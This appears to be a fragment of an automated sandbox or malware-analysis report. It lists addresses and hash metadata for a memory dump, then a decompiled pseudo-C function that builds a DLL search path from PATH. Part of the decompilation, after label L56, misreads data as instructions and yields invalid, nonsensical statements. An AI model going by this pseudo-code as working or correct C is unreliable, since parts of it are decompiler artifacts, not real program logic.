                                                                                  0x00ecbab1
                                                                                  0x00f12cd5
                                                                                  0x00f12cdd
                                                                                  0x00f12cdd
                                                                                  0x00ecbabb
                                                                                  0x00ecbabc
                                                                                  0x00ecbac2
                                                                                  0x00ecbac3
                                                                                  0x00ecbac3
                                                                                  0x00ecbac6
                                                                                  0x00000000
                                                                                  0x00ecb9dd
                                                                                  0x00ecb9dd
                                                                                  0x00ecb9e7
                                                                                  0x00ecb9e7
                                                                                  0x00ecb9ec
                                                                                  0x00ecb9ec
                                                                                  0x00ecb9f1
                                                                                  0x00ecb9f5
                                                                                  0x00ecb9fa
                                                                                  0x00ecba00
                                                                                  0x00ecba0c
                                                                                  0x00ecba10
                                                                                  0x00ecba10
                                                                                  0x00ecba12
                                                                                  0x00ecba18
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00ecbb26
                                                                                  0x00ecbb26
                                                                                  0x00ecba1e
                                                                                  0x00ecba1e
                                                                                  0x00ecba23
                                                                                  0x00ecba25
                                                                                  0x00ecba2c
                                                                                  0x00ecba30
                                                                                  0x00ecba35
                                                                                  0x00ecba35
                                                                                  0x00ecba41
                                                                                  0x00ecba46
                                                                                  0x00ecba4c
                                                                                  0x00ecba50
                                                                                  0x00ecba54
                                                                                  0x00ecba6a
                                                                                  0x00ecba6e
                                                                                  0x00ecba70
                                                                                  0x00ecba74
                                                                                  0x00ecba78
                                                                                  0x00ecba7a
                                                                                  0x00ecba7c
                                                                                  0x00ecba8e
                                                                                  0x00ecba90
                                                                                  0x00ecba92
                                                                                  0x00ecbb14
                                                                                  0x00ecbb14
                                                                                  0x00ecbb16
                                                                                  0x00ecbb16
                                                                                  0x00000000
                                                                                  0x00ecba7c
                                                                                  0x00ecbb0a
                                                                                  0x00ecbb0d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00ecbb0f

                                                                                  APIs
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00ECB9A5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                  • String ID:
                                                                                  • API String ID: 885266447-0
                                                                                  • Opcode ID: 2ba8e9467f5b5b3febdef34421deaed233622040a874f16c7186d80a57b2b163
                                                                                  • Instruction ID: 1367a1cc38ce77f63b84ce9371f003018b63e48b612288e870ad8b610f8d8282
                                                                                  • Opcode Fuzzy Hash: 2ba8e9467f5b5b3febdef34421deaed233622040a874f16c7186d80a57b2b163
                                                                                  • Instruction Fuzzy Hash: 3D517870A08340CFC720CF29C581A2ABBE5BB88354F24996EF5C5A7355DB32EC41CB92
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 81%
                                                                                  			E00ED2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1530200297) {
                                                                                  				signed int _v8;
                                                                                  				signed int _v16;
                                                                                  				unsigned int _v24;
                                                                                  				void* _v28;
                                                                                  				signed int _v32;
                                                                                  				unsigned int _v36;
                                                                                  				signed int _v37;
                                                                                  				signed int _v40;
                                                                                  				signed int _v44;
                                                                                  				signed int _v48;
                                                                                  				signed int _v52;
                                                                                  				signed int _v56;
                                                                                  				intOrPtr _v60;
                                                                                  				signed int _v64;
                                                                                  				signed int _v68;
                                                                                  				signed int _v72;
                                                                                  				signed int _v76;
                                                                                  				signed int _v80;
                                                                                  				signed int _t243;
                                                                                  				signed int _t247;
                                                                                  				void* _t248;
                                                                                  				signed int _t253;
                                                                                  				signed int _t255;
                                                                                  				intOrPtr _t257;
                                                                                  				signed int _t260;
                                                                                  				signed int _t267;
                                                                                  				signed int _t270;
                                                                                  				signed int _t278;
                                                                                  				intOrPtr _t284;
                                                                                  				signed int _t286;
                                                                                  				signed int _t288;
                                                                                  				void* _t289;
                                                                                  				void* _t290;
                                                                                  				signed int _t291;
                                                                                  				unsigned int _t294;
                                                                                  				signed int _t298;
                                                                                  				void* _t299;
                                                                                  				signed int _t301;
                                                                                  				signed int _t305;
                                                                                  				intOrPtr _t317;
                                                                                  				signed int _t326;
                                                                                  				signed int _t328;
                                                                                  				signed int _t329;
                                                                                  				signed int _t333;
                                                                                  				signed int _t334;
                                                                                  				signed int _t336;
                                                                                  				signed int _t338;
                                                                                  				signed int _t341;
                                                                                  				void* _t342;
                                                                                  
                                                                                  				_t338 = _t341;
                                                                                  				_t342 = _t341 - 0x4c;
                                                                                  				_v8 =  *0xf9d360 ^ _t338;
                                                                                  				_push(__ebx);
                                                                                  				_push(__esi);
                                                                                  				_push(__edi);
                                                                                  				_t333 = 0xf9b2e8;
                                                                                  				_v56 = _a4;
                                                                                  				_v48 = __edx;
                                                                                  				_v60 = __ecx;
                                                                                  				_t294 = 0;
                                                                                  				_v80 = 0;
                                                                                  				asm("movsd");
                                                                                  				_v64 = 0;
                                                                                  				_v76 = 0;
                                                                                  				_v72 = 0;
                                                                                  				asm("movsd");
                                                                                  				_v44 = 0;
                                                                                  				_v52 = 0;
                                                                                  				_v68 = 0;
                                                                                  				asm("movsd");
                                                                                  				_v32 = 0;
                                                                                  				_v36 = 0;
                                                                                  				asm("movsd");
                                                                                  				_v16 = 0;
                                                                                  				_t284 = 0x48;
                                                                                  				_t315 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
                                                                                  				_t326 = 0;
                                                                                  				_v37 = _t315;
                                                                                  				if(_v48 <= 0) {
                                                                                  					L16:
                                                                                  					_t45 = _t284 - 0x48; // 0x0
                                                                                  					__eflags = _t45 - 0xfffe;
                                                                                  					if(_t45 > 0xfffe) {
                                                                                  						_t334 = 0xc0000106;
                                                                                  						goto L32;
                                                                                  					} else {
                                                                                  						_t333 = L00EC4620(_t294,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t284);
                                                                                  						_v52 = _t333;
                                                                                  						__eflags = _t333;
                                                                                  						if(_t333 == 0) {
                                                                                  							_t334 = 0xc0000017;
                                                                                  							goto L32;
                                                                                  						} else {
                                                                                  							 *(_t333 + 0x44) =  *(_t333 + 0x44) & 0x00000000;
                                                                                  							_t50 = _t333 + 0x48; // 0x48
                                                                                  							_t328 = _t50;
                                                                                  							_t315 = _v32;
                                                                                  							 *((intOrPtr*)(_t333 + 0x3c)) = _t284;
                                                                                  							_t286 = 0;
                                                                                  							 *((short*)(_t333 + 0x30)) = _v48;
                                                                                  							__eflags = _t315;
                                                                                  							if(_t315 != 0) {
                                                                                  								 *(_t333 + 0x18) = _t328;
                                                                                  								__eflags = _t315 - 0xf98478;
                                                                                  								 *_t333 = ((0 | _t315 == 0x00f98478) - 0x00000001 & 0xfffffffb) + 7;
                                                                                  								E00EEF3E0(_t328,  *((intOrPtr*)(_t315 + 4)),  *_t315 & 0x0000ffff);
                                                                                  								_t315 = _v32;
                                                                                  								_t342 = _t342 + 0xc;
                                                                                  								_t286 = 1;
                                                                                  								__eflags = _a8;
                                                                                  								_t328 = _t328 + (( *_t315 & 0x0000ffff) >> 1) * 2;
                                                                                  								if(_a8 != 0) {
                                                                                  									_t278 = E00F339F2(_t328);
                                                                                  									_t315 = _v32;
                                                                                  									_t328 = _t278;
                                                                                  								}
                                                                                  							}
                                                                                  							_t298 = 0;
                                                                                  							_v16 = 0;
                                                                                  							__eflags = _v48;
                                                                                  							if(_v48 <= 0) {
                                                                                  								L31:
                                                                                  								_t334 = _v68;
                                                                                  								__eflags = 0;
                                                                                  								 *((short*)(_t328 - 2)) = 0;
                                                                                  								goto L32;
                                                                                  							} else {
                                                                                  								_t288 = _t333 + _t286 * 4;
                                                                                  								_v56 = _t288;
                                                                                  								do {
                                                                                  									__eflags = _t315;
                                                                                  									if(_t315 != 0) {
                                                                                  										_t243 =  *(_v60 + _t298 * 4);
                                                                                  										__eflags = _t243;
                                                                                  										if(_t243 == 0) {
                                                                                  											goto L30;
                                                                                  										} else {
                                                                                  											__eflags = _t243 == 5;
                                                                                  											if(_t243 == 5) {
                                                                                  												goto L30;
                                                                                  											} else {
                                                                                  												goto L22;
                                                                                  											}
                                                                                  										}
                                                                                  									} else {
                                                                                  										L22:
                                                                                  										 *_t288 =  *(_v60 + _t298 * 4);
                                                                                  										 *(_t288 + 0x18) = _t328;
                                                                                  										_t247 =  *(_v60 + _t298 * 4);
                                                                                  										__eflags = _t247 - 8;
                                                                                  										if(_t247 > 8) {
                                                                                  											goto L56;
                                                                                  										} else {
                                                                                  											switch( *((intOrPtr*)(_t247 * 4 +  &M00ED2959))) {
                                                                                  												case 0:
                                                                                  													__ax =  *0xf98488;
                                                                                  													__eflags = __ax;
                                                                                  													if(__ax == 0) {
                                                                                  														goto L29;
                                                                                  													} else {
                                                                                  														__ax & 0x0000ffff = E00EEF3E0(__edi,  *0xf9848c, __ax & 0x0000ffff);
                                                                                  														__eax =  *0xf98488 & 0x0000ffff;
                                                                                  														goto L26;
                                                                                  													}
                                                                                  													goto L108;
                                                                                  												case 1:
                                                                                  													L45:
                                                                                  													E00EEF3E0(_t328, _v80, _v64);
                                                                                  													_t273 = _v64;
                                                                                  													goto L26;
                                                                                  												case 2:
                                                                                  													 *0xf98480 & 0x0000ffff = E00EEF3E0(__edi,  *0xf98484,  *0xf98480 & 0x0000ffff);
                                                                                  													__eax =  *0xf98480 & 0x0000ffff;
                                                                                  													__eax = ( *0xf98480 & 0x0000ffff) >> 1;
                                                                                  													__edi = __edi + __eax * 2;
                                                                                  													goto L28;
                                                                                  												case 3:
                                                                                  													__eax = _v44;
                                                                                  													__eflags = __eax;
                                                                                  													if(__eax == 0) {
                                                                                  														goto L29;
                                                                                  													} else {
                                                                                  														__esi = __eax + __eax;
                                                                                  														__eax = E00EEF3E0(__edi, _v72, __esi);
                                                                                  														__edi = __edi + __esi;
                                                                                  														__esi = _v52;
                                                                                  														goto L27;
                                                                                  													}
                                                                                  													goto L108;
                                                                                  												case 4:
                                                                                  													_push(0x2e);
                                                                                  													_pop(__eax);
                                                                                  													 *(__esi + 0x44) = __edi;
                                                                                  													 *__edi = __ax;
                                                                                  													__edi = __edi + 4;
                                                                                  													_push(0x3b);
                                                                                  													_pop(__eax);
                                                                                  													 *(__edi - 2) = __ax;
                                                                                  													goto L29;
                                                                                  												case 5:
                                                                                  													__eflags = _v36;
                                                                                  													if(_v36 == 0) {
                                                                                  														goto L45;
                                                                                  													} else {
                                                                                  														E00EEF3E0(_t328, _v76, _v36);
                                                                                  														_t273 = _v36;
                                                                                  													}
                                                                                  													L26:
                                                                                  													_t342 = _t342 + 0xc;
                                                                                  													_t328 = _t328 + (_t273 >> 1) * 2 + 2;
                                                                                  													__eflags = _t328;
                                                                                  													L27:
                                                                                  													_push(0x3b);
                                                                                  													_pop(_t275);
                                                                                  													 *((short*)(_t328 - 2)) = _t275;
                                                                                  													goto L28;
                                                                                  												case 6:
                                                                                  													__ebx =  *0xf9575c;
                                                                                  													__eflags = __ebx - 0xf9575c;
                                                                                  													if(__ebx != 0xf9575c) {
                                                                                  														_push(0x3b);
                                                                                  														_pop(__esi);
                                                                                  														do {
                                                                                  															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                                                                                  															E00EEF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                                                                                  															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                                                                                  															__edi = __edi + __eax * 2;
                                                                                  															__edi = __edi + 2;
                                                                                  															 *(__edi - 2) = __si;
                                                                                  															__ebx =  *__ebx;
                                                                                  															__eflags = __ebx - 0xf9575c;
                                                                                  														} while (__ebx != 0xf9575c);
                                                                                  														__esi = _v52;
                                                                                  														__ecx = _v16;
                                                                                  														__edx = _v32;
                                                                                  													}
                                                                                  													__ebx = _v56;
                                                                                  													goto L29;
                                                                                  												case 7:
                                                                                  													 *0xf98478 & 0x0000ffff = E00EEF3E0(__edi,  *0xf9847c,  *0xf98478 & 0x0000ffff);
                                                                                  													__eax =  *0xf98478 & 0x0000ffff;
                                                                                  													__eax = ( *0xf98478 & 0x0000ffff) >> 1;
                                                                                  													__eflags = _a8;
                                                                                  													__edi = __edi + __eax * 2;
                                                                                  													if(_a8 != 0) {
                                                                                  														__ecx = __edi;
                                                                                  														__eax = E00F339F2(__ecx);
                                                                                  														__edi = __eax;
                                                                                  													}
                                                                                  													goto L28;
                                                                                  												case 8:
                                                                                  													__eax = 0;
                                                                                  													 *(__edi - 2) = __ax;
                                                                                  													 *0xf96e58 & 0x0000ffff = E00EEF3E0(__edi,  *0xf96e5c,  *0xf96e58 & 0x0000ffff);
                                                                                  													 *(__esi + 0x38) = __edi;
                                                                                  													__eax =  *0xf96e58 & 0x0000ffff;
                                                                                  													__eax = ( *0xf96e58 & 0x0000ffff) >> 1;
                                                                                  													__edi = __edi + __eax * 2;
                                                                                  													__edi = __edi + 2;
                                                                                  													L28:
                                                                                  													_t298 = _v16;
                                                                                  													_t315 = _v32;
                                                                                  													L29:
                                                                                  													_t288 = _t288 + 4;
                                                                                  													__eflags = _t288;
                                                                                  													_v56 = _t288;
                                                                                  													goto L30;
                                                                                  											}
                                                                                  										}
                                                                                  									}
                                                                                  									goto L108;
                                                                                  									L30:
                                                                                  									_t298 = _t298 + 1;
                                                                                  									_v16 = _t298;
                                                                                  									__eflags = _t298 - _v48;
                                                                                  								} while (_t298 < _v48);
                                                                                  								goto L31;
                                                                                  							}
                                                                                  						}
                                                                                  					}
                                                                                  				} else {
                                                                                  					while(1) {
                                                                                  						L1:
                                                                                  						_t247 =  *(_v60 + _t326 * 4);
                                                                                  						if(_t247 > 8) {
                                                                                  							break;
                                                                                  						}
                                                                                  						switch( *((intOrPtr*)(_t247 * 4 +  &M00ED2935))) {
                                                                                  							case 0:
                                                                                  								__ax =  *0xf98488;
                                                                                  								__eflags = __ax;
                                                                                  								if(__ax != 0) {
                                                                                  									__eax = __ax & 0x0000ffff;
                                                                                  									__ebx = __ebx + 2;
                                                                                  									__eflags = __ebx;
                                                                                  									goto L53;
                                                                                  								}
                                                                                  								goto L14;
                                                                                  							case 1:
                                                                                  								L44:
                                                                                  								_t315 =  &_v64;
                                                                                  								_v80 = E00ED2E3E(0,  &_v64);
                                                                                  								_t284 = _t284 + _v64 + 2;
                                                                                  								goto L13;
                                                                                  							case 2:
                                                                                  								__eax =  *0xf98480 & 0x0000ffff;
                                                                                  								__ebx = __ebx + __eax;
                                                                                  								__eflags = __dl;
                                                                                  								if(__dl != 0) {
                                                                                  									__eax = 0xf98480;
                                                                                  									goto L80;
                                                                                  								}
                                                                                  								goto L14;
                                                                                  							case 3:
                                                                                  								__eax = E00EBEEF0(0xf979a0);
                                                                                  								__eax =  &_v44;
                                                                                  								_push(__eax);
                                                                                  								_push(0);
                                                                                  								_push(0);
                                                                                  								_push(4);
                                                                                  								_push(L"PATH");
                                                                                  								_push(0);
                                                                                  								L57();
                                                                                  								__esi = __eax;
                                                                                  								_v68 = __esi;
                                                                                  								__eflags = __esi - 0xc0000023;
                                                                                  								if(__esi != 0xc0000023) {
                                                                                  									L10:
                                                                                  									__eax = E00EBEB70(__ecx, 0xf979a0);
                                                                                  									__eflags = __esi - 0xc0000100;
                                                                                  									if(__esi == 0xc0000100) {
                                                                                  										_v44 = _v44 & 0x00000000;
                                                                                  										__eax = 0;
                                                                                  										_v68 = 0;
                                                                                  										goto L13;
                                                                                  									} else {
                                                                                  										__eflags = __esi;
                                                                                  										if(__esi < 0) {
                                                                                  											L32:
                                                                                  											_t221 = _v72;
                                                                                  											__eflags = _t221;
                                                                                  											if(_t221 != 0) {
                                                                                  												L00EC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t221);
                                                                                  											}
                                                                                  											_t222 = _v52;
                                                                                  											__eflags = _t222;
                                                                                  											if(_t222 != 0) {
                                                                                  												__eflags = _t334;
                                                                                  												if(_t334 < 0) {
                                                                                  													L00EC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t222);
                                                                                  													_t222 = 0;
                                                                                  												}
                                                                                  											}
                                                                                  											goto L36;
                                                                                  										} else {
                                                                                  											__eax = _v44;
                                                                                  											__ebx = __ebx + __eax * 2;
                                                                                  											__ebx = __ebx + 2;
                                                                                  											__eflags = __ebx;
                                                                                  											L13:
                                                                                  											_t294 = _v36;
                                                                                  											goto L14;
                                                                                  										}
                                                                                  									}
                                                                                  								} else {
                                                                                  									__eax = _v44;
                                                                                  									__ecx =  *0xf97b9c; // 0x0
                                                                                  									_v44 + _v44 =  *[fs:0x30];
                                                                                  									__ecx = __ecx + 0x180000;
                                                                                  									__eax = L00EC4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                                                                                  									_v72 = __eax;
                                                                                  									__eflags = __eax;
                                                                                  									if(__eax == 0) {
                                                                                  										__eax = E00EBEB70(__ecx, 0xf979a0);
                                                                                  										__eax = _v52;
                                                                                  										L36:
                                                                                  										_pop(_t327);
                                                                                  										_pop(_t335);
                                                                                  										__eflags = _v8 ^ _t338;
                                                                                  										_pop(_t285);
                                                                                  										return E00EEB640(_t222, _t285, _v8 ^ _t338, _t315, _t327, _t335);
                                                                                  									} else {
                                                                                  										__ecx =  &_v44;
                                                                                  										_push(__ecx);
                                                                                  										_push(_v44);
                                                                                  										_push(__eax);
                                                                                  										_push(4);
                                                                                  										_push(L"PATH");
                                                                                  										_push(0);
                                                                                  										L57();
                                                                                  										__esi = __eax;
                                                                                  										_v68 = __eax;
                                                                                  										goto L10;
                                                                                  									}
                                                                                  								}
                                                                                  								goto L108;
                                                                                  							case 4:
                                                                                  								__ebx = __ebx + 4;
                                                                                  								goto L14;
                                                                                  							case 5:
                                                                                  								_t280 = _v56;
                                                                                  								if(_v56 != 0) {
                                                                                  									_t315 =  &_v36;
                                                                                  									_t282 = E00ED2E3E(_t280,  &_v36);
                                                                                  									_t294 = _v36;
                                                                                  									_v76 = _t282;
                                                                                  								}
                                                                                  								if(_t294 == 0) {
                                                                                  									goto L44;
                                                                                  								} else {
                                                                                  									_t284 = _t284 + 2 + _t294;
                                                                                  								}
                                                                                  								goto L14;
                                                                                  							case 6:
                                                                                  								__eax =  *0xf95764 & 0x0000ffff;
                                                                                  								goto L53;
                                                                                  							case 7:
                                                                                  								__eax =  *0xf98478 & 0x0000ffff;
                                                                                  								__ebx = __ebx + __eax;
                                                                                  								__eflags = _a8;
                                                                                  								if(_a8 != 0) {
                                                                                  									__ebx = __ebx + 0x16;
                                                                                  									__ebx = __ebx + __eax;
                                                                                  								}
                                                                                  								__eflags = __dl;
                                                                                  								if(__dl != 0) {
                                                                                  									__eax = 0xf98478;
                                                                                  									L80:
                                                                                  									_v32 = __eax;
                                                                                  								}
                                                                                  								goto L14;
                                                                                  							case 8:
                                                                                  								__eax =  *0xf96e58 & 0x0000ffff;
                                                                                  								__eax = ( *0xf96e58 & 0x0000ffff) + 2;
                                                                                  								L53:
                                                                                  								__ebx = __ebx + __eax;
                                                                                  								L14:
                                                                                  								_t326 = _t326 + 1;
                                                                                  								if(_t326 >= _v48) {
                                                                                  									goto L16;
                                                                                  								} else {
                                                                                  									_t315 = _v37;
                                                                                  									goto L1;
                                                                                  								}
                                                                                  								goto L108;
                                                                                  						}
                                                                                  					}
                                                                                  					L56:
                                                                                  					_t299 = 0x25;
                                                                                  					asm("int 0x29");
                                                                                  					asm("out 0x28, al");
                                                                                  					asm("in eax, dx");
                                                                                  					 *((intOrPtr*)(_t333 + 0x28)) =  *((intOrPtr*)(_t333 + 0x28)) + _t247;
                                                                                  					asm("in eax, dx");
                                                                                  					_t248 = _t247 + _t247;
                                                                                  					asm("daa");
                                                                                  					asm("in eax, dx");
                                                                                  					 *_t333 =  *_t333 + _t299;
                                                                                  					asm("in eax, dx");
                                                                                  					 *((intOrPtr*)(_t333 + 0x28)) =  *((intOrPtr*)(_t333 + 0x28)) + _t248;
                                                                                  					asm("in eax, dx");
                                                                                  					 *0x1f00ed26 =  *0x1f00ed26 + _t248;
                                                                                  					_pop(_t289);
                                                                                  					asm("int1");
                                                                                  					 *((intOrPtr*)(_t248 +  &_a1530200297)) =  *((intOrPtr*)(_t248 +  &_a1530200297)) + _t315;
                                                                                  					asm("int1");
                                                                                  					 *_t315 =  *_t315 + _t248;
                                                                                  					 *((intOrPtr*)(_t248 - 0x9ff12d8)) =  *((intOrPtr*)(_t248 - 0x9ff12d8)) + _t248;
                                                                                  					asm("daa");
                                                                                  					asm("in eax, dx");
                                                                                  					 *_t333 =  *_t333 + _t289;
                                                                                  					 *((intOrPtr*)(_t333 + 0x28)) =  *((intOrPtr*)(_t333 + 0x28));
                                                                                  					asm("in eax, dx");
                                                                                  					 *0x00000027 =  *((intOrPtr*)(0x27)) + _t289;
                                                                                  					asm("in eax, dx");
                                                                                  					_pop(_t290);
                                                                                  					asm("int1");
                                                                                  					 *((intOrPtr*)(_t248 + _t289 + 0x5c3400ed)) =  *((intOrPtr*)(_t248 + _t289 + 0x5c3400ed)) + _t315;
                                                                                  					asm("int1");
                                                                                  					asm("int3");
                                                                                  					asm("int3");
                                                                                  					asm("int3");
                                                                                  					asm("int3");
                                                                                  					asm("int3");
                                                                                  					asm("int3");
                                                                                  					asm("int3");
                                                                                  					asm("int3");
                                                                                  					asm("int3");
                                                                                  					asm("int3");
                                                                                  					asm("int3");
                                                                                  					asm("int3");
                                                                                  					asm("int3");
                                                                                  					asm("int3");
                                                                                  					asm("int3");
                                                                                  					asm("int3");
                                                                                  					asm("int3");
                                                                                  					asm("int3");
                                                                                  					_push(0x20);
                                                                                  					_push(0xf7ff00);
                                                                                  					E00EFD08C(_t290, _t328, _t333);
                                                                                  					 *0xFFFFFFFFFFFFFFD8 =  *[fs:0x18];
                                                                                  					_t329 = 0;
                                                                                  					 *((intOrPtr*)( *0x0000001C)) = 0;
                                                                                  					_t291 =  *0x00000010;
                                                                                  					__eflags = _t291;
                                                                                  					if(_t291 == 0) {
                                                                                  						_t253 = 0xc0000100;
                                                                                  					} else {
                                                                                  						 *0xFFFFFFFFFFFFFFFC = 0;
                                                                                  						_t336 = 0xc0000100;
                                                                                  						 *0xFFFFFFFFFFFFFFD0 = 0xc0000100;
                                                                                  						_t255 = 4;
                                                                                  						while(1) {
                                                                                  							_v40 = _t255;
                                                                                  							__eflags = _t255;
                                                                                  							if(_t255 == 0) {
                                                                                  								break;
                                                                                  							}
                                                                                  							_t305 = _t255 * 0xc;
                                                                                  							_v48 = _t305;
                                                                                  							__eflags = _t291 -  *((intOrPtr*)(_t305 + 0xe81664));
                                                                                  							if(__eflags <= 0) {
                                                                                  								if(__eflags == 0) {
                                                                                  									_t270 = E00EEE5C0(_a8,  *((intOrPtr*)(_t305 + 0xe81668)), _t291);
                                                                                  									_t342 = _t342 + 0xc;
                                                                                  									__eflags = _t270;
                                                                                  									if(__eflags == 0) {
                                                                                  										_t336 = E00F251BE(_t291,  *((intOrPtr*)(_v48 + 0xe8166c)), _a16, _t329, _t336, __eflags, _a20, _a24);
                                                                                  										_v52 = _t336;
                                                                                  										break;
                                                                                  									} else {
                                                                                  										_t255 = _v40;
                                                                                  										goto L62;
                                                                                  									}
                                                                                  									goto L70;
                                                                                  								} else {
                                                                                  									L62:
                                                                                  									_t255 = _t255 - 1;
                                                                                  									continue;
                                                                                  								}
                                                                                  							}
                                                                                  							break;
                                                                                  						}
                                                                                  						_v32 = _t336;
                                                                                  						__eflags = _t336;
                                                                                  						if(_t336 < 0) {
                                                                                  							__eflags = _t336 - 0xc0000100;
                                                                                  							if(_t336 == 0xc0000100) {
                                                                                  								_t301 = _a4;
                                                                                  								__eflags = _t301;
                                                                                  								if(_t301 != 0) {
                                                                                  									_v36 = _t301;
                                                                                  									__eflags =  *_t301 - _t329;
                                                                                  									if( *_t301 == _t329) {
                                                                                  										_t336 = 0xc0000100;
                                                                                  										goto L76;
                                                                                  									} else {
                                                                                  										_t317 =  *((intOrPtr*)(_v44 + 0x30));
                                                                                  										_t257 =  *((intOrPtr*)(_t317 + 0x10));
                                                                                  										__eflags =  *((intOrPtr*)(_t257 + 0x48)) - _t301;
                                                                                  										if( *((intOrPtr*)(_t257 + 0x48)) == _t301) {
                                                                                  											__eflags =  *(_t317 + 0x1c);
                                                                                  											if( *(_t317 + 0x1c) == 0) {
                                                                                  												L106:
                                                                                  												_t336 = E00ED2AE4( &_v36, _a8, _t291, _a16, _a20, _a24);
                                                                                  												_v32 = _t336;
                                                                                  												__eflags = _t336 - 0xc0000100;
                                                                                  												if(_t336 != 0xc0000100) {
                                                                                  													goto L69;
                                                                                  												} else {
                                                                                  													_t329 = 1;
                                                                                  													_t301 = _v36;
                                                                                  													goto L75;
                                                                                  												}
                                                                                  											} else {
                                                                                  												_t260 = E00EB6600( *(_t317 + 0x1c));
                                                                                  												__eflags = _t260;
                                                                                  												if(_t260 != 0) {
                                                                                  													goto L106;
                                                                                  												} else {
                                                                                  													_t301 = _a4;
                                                                                  													goto L75;
                                                                                  												}
                                                                                  											}
                                                                                  										} else {
                                                                                  											L75:
                                                                                  											_t336 = E00ED2C50(_t301, _a8, _t291, _a16, _a20, _a24, _t329);
                                                                                  											L76:
                                                                                  											_v32 = _t336;
                                                                                  											goto L69;
                                                                                  										}
                                                                                  									}
                                                                                  									goto L108;
                                                                                  								} else {
                                                                                  									E00EBEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                  									_v8 = 1;
                                                                                  									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                                                                                  									_t336 = _a24;
                                                                                  									_t267 = E00ED2AE4( &_v36, _a8, _t291, _a16, _a20, _t336);
                                                                                  									_v32 = _t267;
                                                                                  									__eflags = _t267 - 0xc0000100;
                                                                                  									if(_t267 == 0xc0000100) {
                                                                                  										_v32 = E00ED2C50(_v36, _a8, _t291, _a16, _a20, _t336, 1);
                                                                                  									}
                                                                                  									_v8 = _t329;
                                                                                  									E00ED2ACB();
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  						L69:
                                                                                  						_v8 = 0xfffffffe;
                                                                                  						_t253 = _t336;
                                                                                  					}
                                                                                  					L70:
                                                                                  					return E00EFD0D1(_t253);
                                                                                  				}
                                                                                  				L108:
                                                                                  			}




















































                                                                                  0x00ed2584
                                                                                  0x00ed2586
                                                                                  0x00ed2590
                                                                                  0x00ed2596
                                                                                  0x00ed2597
                                                                                  0x00ed2598
                                                                                  0x00ed2599
                                                                                  0x00ed259e
                                                                                  0x00ed25a4
                                                                                  0x00ed25a9
                                                                                  0x00ed25ac
                                                                                  0x00ed25ae
                                                                                  0x00ed25b1
                                                                                  0x00ed25b2
                                                                                  0x00ed25b5
                                                                                  0x00ed25b8
                                                                                  0x00ed25bb
                                                                                  0x00ed25bc
                                                                                  0x00ed25bf
                                                                                  0x00ed25c2
                                                                                  0x00ed25c5
                                                                                  0x00ed25c6
                                                                                  0x00ed25cb
                                                                                  0x00ed25ce
                                                                                  0x00ed25d8
                                                                                  0x00ed25dd
                                                                                  0x00ed25de
                                                                                  0x00ed25e1
                                                                                  0x00ed25e3
                                                                                  0x00ed25e9
                                                                                  0x00ed26da
                                                                                  0x00ed26da
                                                                                  0x00ed26dd
                                                                                  0x00ed26e2
                                                                                  0x00f15b56
                                                                                  0x00000000
                                                                                  0x00ed26e8
                                                                                  0x00ed26f9
                                                                                  0x00ed26fb
                                                                                  0x00ed26fe
                                                                                  0x00ed2700
                                                                                  0x00f15b60
                                                                                  0x00000000
                                                                                  0x00ed2706
                                                                                  0x00ed2706
                                                                                  0x00ed270a
                                                                                  0x00ed270a
                                                                                  0x00ed270d
                                                                                  0x00ed2713
                                                                                  0x00ed2716
                                                                                  0x00ed2718
                                                                                  0x00ed271c
                                                                                  0x00ed271e
                                                                                  0x00f15b6c
                                                                                  0x00f15b6f
                                                                                  0x00f15b7f
                                                                                  0x00f15b89
                                                                                  0x00f15b8e
                                                                                  0x00f15b93
                                                                                  0x00f15b96
                                                                                  0x00f15b9c
                                                                                  0x00f15ba0
                                                                                  0x00f15ba3
                                                                                  0x00f15bab
                                                                                  0x00f15bb0
                                                                                  0x00f15bb3
                                                                                  0x00f15bb3
                                                                                  0x00f15ba3
                                                                                  0x00ed2724
                                                                                  0x00ed2726
                                                                                  0x00ed2729
                                                                                  0x00ed272c
                                                                                  0x00ed279d
                                                                                  0x00ed279d
                                                                                  0x00ed27a0
                                                                                  0x00ed27a2
                                                                                  0x00000000
                                                                                  0x00ed272e
                                                                                  0x00ed272e
                                                                                  0x00ed2731
                                                                                  0x00ed2734
                                                                                  0x00ed2734
                                                                                  0x00ed2736
                                                                                  0x00f15bc1
                                                                                  0x00f15bc1
                                                                                  0x00f15bc4
                                                                                  0x00000000
                                                                                  0x00f15bca
                                                                                  0x00f15bca
                                                                                  0x00f15bcd
                                                                                  0x00000000
                                                                                  0x00f15bd3
                                                                                  0x00000000
                                                                                  0x00f15bd3
                                                                                  0x00f15bcd
                                                                                  0x00ed273c
                                                                                  0x00ed273c
                                                                                  0x00ed2742
                                                                                  0x00ed2747
                                                                                  0x00ed274a
                                                                                  0x00ed274d
                                                                                  0x00ed2750
                                                                                  0x00000000
                                                                                  0x00ed2756
                                                                                  0x00ed2756
                                                                                  0x00000000
                                                                                  0x00ed2902
                                                                                  0x00ed2908
                                                                                  0x00ed290b
                                                                                  0x00000000
                                                                                  0x00ed2911
                                                                                  0x00ed291c
                                                                                  0x00ed2921
